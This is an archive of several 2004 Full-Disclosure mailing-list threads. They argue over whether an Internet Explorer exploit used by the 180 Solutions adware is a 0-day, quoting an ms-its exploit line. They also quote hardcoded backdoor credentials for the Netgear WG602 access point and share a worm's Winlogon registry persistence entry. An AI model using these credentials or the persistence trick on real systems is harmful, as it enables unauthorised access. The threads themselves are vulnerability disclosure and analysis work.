> least 2 new and AFAIK unpublished vulnerabilities (feel free to proof me
> wrong) out there in the wild, one being fairly sophisticated 

I, personally, appreciate any serious research work, but why put down a 
colleague while you're at it?

> You can view it at:
> 
> http://62.131.86.111/analysis.htm
> 
> Additionally you can view a harmless demonstration of the vulnerabilities
at
> 
> http://62.131.86.111/security/idiots/repro/installer.htm
> 
> Finally I also attached the source files to this message

If this really was a 0-day, isn't that a tad irresponsible?

As to Thor...

You are claiming that he is deliberately spreading disinformation, but 
then you proceed to verify his claims.

Are you sure you don't just have a personal vendetta against him?
I don't see what's wrong with him pitching his product (Quik-Fix (?)) 
when reporting his research. That's how the industry work.

You do research and advertise the company that did it, and what solution 
it offers.
Working for free doesn't put food on the table and he has a product that 
might actually protects against such issues. What's next, you will 
complain about AV companies who say they detect a virus or security 
researchers that get paid to work instead of living off the street 
credit from the security mailing lists? Maybe you just don't like 
companies of any kind.

As to the research itself...

Thor went through the hnc3k.com website and listed all the pages and 
vulnerabilities on it, which sounds lik

Re: [Full-Disclosure] Re: Internet explorer 6 execution of arbitrary code (An analysis of the 180 Solutions Trojan)

[Michael Evanchik]

Although this ms-its exploit has been around ,the 
true author of finding this is an UNKNOWN author.  I remember when it was 
_reported_ by Thor but he did not take credit.  As for it being 
0-day.  It sure is.  None of microsofts's patches stop it nor did 
Norton AntiVirus Corp.  I have no idea who you are Gadi to give such 
comments like that.
 
Michael Evanchik
 
www.MichaelEvanchik.com 

  - Original Message - 
  From: 
  Gadi Evron 
  To: Jelmer 
  Cc: [EMAIL PROTECTED] ; [EMAIL PROTECTED] 
  ; [EMAIL PROTECTED] 
  Sent: Monday, June 07, 2004 4:47 PM
  Subject: [Full-Disclosure] Re: Internet 
  explorer 6 execution of arbitrary code (An analysis of the 180 Solutions 
  Trojan)
  Comments inline.Jelmer wrote:> Just when I 
  though it was save to once more use internet explorer I received> an 
  email bringing my attention to this webpage> http://216.130.188.219/ei2/installer.htm   
  that according to him used an> exploit that affected fully patched 
  internet explorer 6 browsers. Being> rather skeptical I carelessly 
  clicked on the link only to witness how it> automatically installed 
  addware on my pc!!!So, you just clicked on the link which was reported 
  as unsafe, did you? :)Those protocol handlers always seem to cause 
  problems and it's not just on Windows, Apple has had just as many problems 
  in dealing with these for OS X. If it's not a lack of input validation 
  then it is a lack of zone restrictions, perhaps the entire concept of 
  higher privileged zones of any kind should be abandoned.Are these 
  really new vulnerabilities or just variants of old? The "Location: URL:" 
  proxy really just looks like the "Location: File:" proxy that Liu Die Yu 
  reported and the object caching stuff really just looks like a variation 
  of the advisories from GreyMagic back in 2002 with the showModalDialog 
  caching and _javascript_: injection. Other than those 2, the only real 
  vulnerability on the page is the Ibiza chm stuff which still works on 
  plenty of fully patched machines.> Now there had been reports about 
  0day exploits making rounds for quite some> time like for instance this 
  post>  > http://www.securityfocus.com/archive/1/363338/2004-05-11/2004-05-17/0 
  Why is this a 0-day? Are you trying to start a holy war here? Please 
  explain why this is a 0-day if you make such claims.> However I 
  hadn't seen any evidence to support this up until now> Thor Larholm as 
  usual added to the confusion by deliberately spreading> disinformation 
  as seen in this post>  > http://seclists.org/lists/bugtraq/2004/May/0153.htmlThor? 
  Spreading disinformation?> Attributing it to and I quote "just one 
  of the remaining IE vulnerabilities> that are not yet 
  patched"That sounds about right.> I’ve attempted to write 
  up an analysis that will show that there are at> least 2 new and AFAIK 
  unpublished vulnerabilities (feel free to proof me> wrong) out there in 
  the wild, one being fairly sophisticated I, personally, appreciate any 
  serious research work, but why put down a colleague while you're at 
  it?> You can view it at:> > http://62.131.86.111/analysis.htm> 
  > Additionally you can view a harmless demonstration of the 
  vulnerabilities at> > http://62.131.86.111/security/idiots/repro/installer.htm> 
  > Finally I also attached the source files to this messageIf 
  this really was a 0-day, isn't that a tad irresponsible?As to 
  Thor...You are claiming that he is deliberately spreading 
  disinformation, but then you proceed to verify his claims.Are you 
  sure you don't just have a personal vendetta against him?I don't see 
  what's wrong with him pitching his product (Quik-Fix (?)) when reporting 
  his research. That's how the industry work.You do research and 
  advertise the company that did it, and what solution it offers.Working 
  for free doesn't put food on the table and he has a product that might 
  actually protects against such issues. What's next, you will complain 
  about AV companies who say they detect a virus or security researchers 
  that get paid to work instead of living off the street credit from the 
  security mailing lists? Maybe you just don't like companies of any 
  kind.As to the research itself...Thor went through the 
  hnc3k.com website and listed all the pages and vulnerabilities on it, 
  which sounds like an exhaustive task to me. But didn't you do the same and 
  when analyzing the 180 solutions Trojan pages? It sounds pretty exhaustive 
  as well.The difference is that Thor also told you how to protect 
  against this, by locking down the My Computer zone. I can't see anywhere 
  that Thor was referring to the object caching vulnerability you are 
  listing as new. In my mind, he was referring to the old Unpatched page 
  that he used to maintain and that would mean he said some of those are 
  still not patched.I miss that page. It was very good.We know 
  that Ibiza still works and that there are still problems with the 

Re: [sb] RE: [Full-Disclosure] Internet explorer 6 execution of arbitrary code (An analysis of the 180 Solutions Trojan)

[BoneMachine]

Hi Jelmer, 
I've read your analysis of the trojan of 180  solutions and noticed the statement that 
this issue uses two zero day exploits.
I'm trying to monitor and register IE vulnerabilities and have a strong feeling I've 
seen the Location header execution before. 
Just to be sure, are you aware that:
- Liu Die Yu discards the local protocol issue as a refresh issue:
http://www.safecenter.net/UMBRELLAWEBV4/IredirNrefresh/IredirNrefresh-MyPage.htm
- Roozbeh Afrasiabi created a paper about vulnerabilities in IE. One of the 
vulnerabilities uses the following statement in the example code :
target.location="ms-its:\\ntshared.chm::/copyright.htm";
The posting to bugtraq can be found at : 
http://archives.neohapsis.com/archives/bugtraq/2004-05/0109.html

To me these issues and your URL: issue seem the same and afaik no patches for these 
issues had been provided. 

Can you proof me wrong?

vriendelijke groet
Bone Machine

---
"hip hip hip" - The Pixies

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Incoming message

[Cm]

 





Alive_condom.cpl
Description: Binary data

Re: [Full-Disclosure] Re: Netgear WG602 Accesspoint vulnerability

[Rip Toren]

Quoting Jan Jungnickel <[EMAIL PROTECTED]>:

> On Tue, Jun 08, 2004 at 10:05:56AM +0200, [EMAIL PROTECTED] wrote:
> 
> > >Netgear has 'fixed' this by changing the username and
> > >password to something else. 
> > I heard the username has been changed to "superman" with the
> > password "21241036". I wonder whose phone number THIS is...
> 
> Precisely. I'm pretty stunned by this blatant example of
> stupidity :/
> 
> -- 
> carmunity.com GmbH  Mary-Astell-Strasse 2
> Jan Jungnickel  28359 Bremen
 <>

  Depending upon how the account name and password are stored, this might have been as
simple as a binary edit of the firmware, with some checksum cleanup. Unfortunately, it
would only take a couple of hours to completely hide any literal values from a 
'strings'
search.

  Even if another firmware is released, and it shows no strings; can it be assured that
the account data has not just been hidden. This might also mean that the V2 product is
also compromised, but with masked account data... who knows?

  Since they seem to have demonstrated a corporate commitment to 'backdoor' their 
product;
it might be time to find a more customer friendly supplier. At least until the is some
public statement by NetGear about the situation.

   I care, I used one of these; until 10 minutes ago.

-- 
Rip Toren
Senior Information Assurance Engineer
Futures Inc.
email: [EMAIL PROTECTED]
website:  http://www.futures-inc.com



-
This mail sent through IMP: http://horde.org/imp/

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] another new worm submission

[Christoph Gruber]

many virusfilters filter *.reg files,
so here the TXT version:



-- 
Christoph Gruber, Security WAT1SE
WAVE Solutions Information Technology GmbH 
Nordbergstrasse 13, A - 1090 Wien, Austria
[EMAIL PROTECTED]
Office: +43 1 71730 53514, Mobile: +43 664 81 22 66 1
PGP-Fingerprint: CCFF 5D66 7073 952C 7AB3  C2DF 435A C85C 558E D42B

[EMAIL PROTECTED] schrieb am
08.06.2004 10:39:46:

> 
> but I forgot to attach it: 
> 
> 
> 
> -- 
> Christoph Gruber, Senior Security Architect
> WAVE Solutions Information Technology GmbH 
> Nordbergstrasse 13, A - 1090 Wien, Austria
> [EMAIL PROTECTED]
> Office: +43 1 71730 53514, Mobile: +43 664 81 22 66 1
> PGP-Fingerprint: CCFF 5D66 7073 952C 7AB3  C2DF 435A C85C 558E
D42B 
> 
> [EMAIL PROTECTED] schrieb am 07.06.2004 14:06:21:
> 
> > 
> > -BEGIN PGP SIGNED MESSAGE- 
> > Hash: SHA1 
> > 
> > Josh wrote 04.06.2004 21:11:26: 
> > 
> > > http://www.detroit-x.com/analysis.htm 
> > > 
> > > This is something we found this morning. I have packet captures

> > > that I will post. 
> > > I have attached the infected files found with FPORT and
also 
> > > registry entries. 
> > > 
> > > We found this rebooting machines with the LSASS.exe error
similar 
> > > to Sasser. As of 6/4/2004 we found no virus defs to pick
it up. 
> > > 
> > > 
> > > Joshua Perrymon 
> > > Sr. Network Security Consultant 
> > 
> > Hi there! 
> > 
> > There is another Registry-entry: 
> > 
> > 
> > Cheers! 
> > 
> > - -- 
> > Christoph Gruber, Senior Security Architect 
> > WAVE Solutions Information Technology GmbH 
> > Nordbergstrasse 13, A - 1090 Wien, Austria 
> > [EMAIL PROTECTED] 
> > Office: +43 1 71730 53514, Mobile: +43 664 81 22 66 1 
> > PGP-Fingerprint: CCFF 5D66 7073 952C 7AB3  C2DF 435A C85C
558E D42B 
> > 
> > 
> > -BEGIN PGP SIGNATURE- 
> > Version: PGP 8.0.3 
> > 
> > iQA/AwUBQMRaFkNayFxVjtQrEQKmYwCg4ufJbS1o/5/C73FUSzBQ+D77OXsAoMLD

> > 82mFBEHVI5D0bGtwTIoLQx9G 
> > =SKaL 
> > -END PGP SIGNATURE-[Anhang "reg1.reg" gelöscht
von 
> Christoph Gruber/DSI/AT] ÿþ[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
 NT\CurrentVersion\Winlogon]

"Shell"="explorer.exe 
C:\\WINDOWS\\System32\\svohost.exe"=

Re: [Full-Disclosure] Re: Netgear WG602 Accesspoint vulnerability

[Jan Jungnickel]

On Tue, Jun 08, 2004 at 10:05:56AM +0200, [EMAIL PROTECTED] wrote:

> >Netgear has 'fixed' this by changing the username and
> >password to something else. 
> I heard the username has been changed to "superman" with the
> password "21241036". I wonder whose phone number THIS is...

Precisely. I'm pretty stunned by this blatant example of
stupidity :/

-- 
carmunity.com GmbH  Mary-Astell-Strasse 2
Jan Jungnickel  28359 Bremen
Telefon: +49-421-6265-110   E-Mail: [EMAIL PROTECTED]
Telefax: +49-421-6265-100   http://www.carmunity.de/


smime.p7s
Description: S/MIME cryptographic signature

Re: [Full-Disclosure] Re: Netgear WG602 Accesspoint vulnerability

[die tuere]

On Tuesday 08 June 2004 10:05, [EMAIL PROTECTED] wrote:
> [EMAIL PROTECTED]
I heard the username has been changed to "superman" with the 
password "21241036". I wonder whose phone number THIS is...

maybe it's supermans phone number, or just pick up the phone and hit in those 
numbers ;)

buzz

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] another new worm submission

[Christoph Gruber]

but I forgot to attach it:



-- 
Christoph Gruber, Senior Security Architect
WAVE Solutions Information Technology GmbH 
Nordbergstrasse 13, A - 1090 Wien, Austria
[EMAIL PROTECTED]
Office: +43 1 71730 53514, Mobile: +43 664 81 22 66 1
PGP-Fingerprint: CCFF 5D66 7073 952C 7AB3  C2DF 435A C85C 558E D42B

[EMAIL PROTECTED] schrieb am
07.06.2004 14:06:21:

> 
> -BEGIN PGP SIGNED MESSAGE- 
> Hash: SHA1 
> 
> Josh wrote 04.06.2004 21:11:26: 
> 
> > http://www.detroit-x.com/analysis.htm 
> > 
> > This is something we found this morning. I have packet captures

> > that I will post. 
> > I have attached the infected files found with FPORT and also

> > registry entries. 
> > 
> > We found this rebooting machines with the LSASS.exe error similar

> > to Sasser. As of 6/4/2004 we found no virus defs to pick it up.

> > 
> > 
> > Joshua Perrymon 
> > Sr. Network Security Consultant 
> 
> Hi there! 
> 
> There is another Registry-entry: 
> 
> 
> Cheers! 
> 
> - -- 
> Christoph Gruber, Senior Security Architect 
> WAVE Solutions Information Technology GmbH 
> Nordbergstrasse 13, A - 1090 Wien, Austria 
> [EMAIL PROTECTED] 
> Office: +43 1 71730 53514, Mobile: +43 664 81 22 66 1 
> PGP-Fingerprint: CCFF 5D66 7073 952C 7AB3  C2DF 435A C85C 558E
D42B 
> 
> 
> -BEGIN PGP SIGNATURE- 
> Version: PGP 8.0.3 
> 
> iQA/AwUBQMRaFkNayFxVjtQrEQKmYwCg4ufJbS1o/5/C73FUSzBQ+D77OXsAoMLD 
> 82mFBEHVI5D0bGtwTIoLQx9G 
> =SKaL 
> -END PGP SIGNATURE-

reg1.reg
Description: Binary data

Re: [Full-Disclosure] Re: Netgear WG602 Accesspoint vulnerability

[pera]

>Netgear has 'fixed' this by changing the username and password
>to something else. 

I heard the username has been changed to "superman" with the 
password "21241036". I wonder whose phone number THIS is...

- Pera



___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html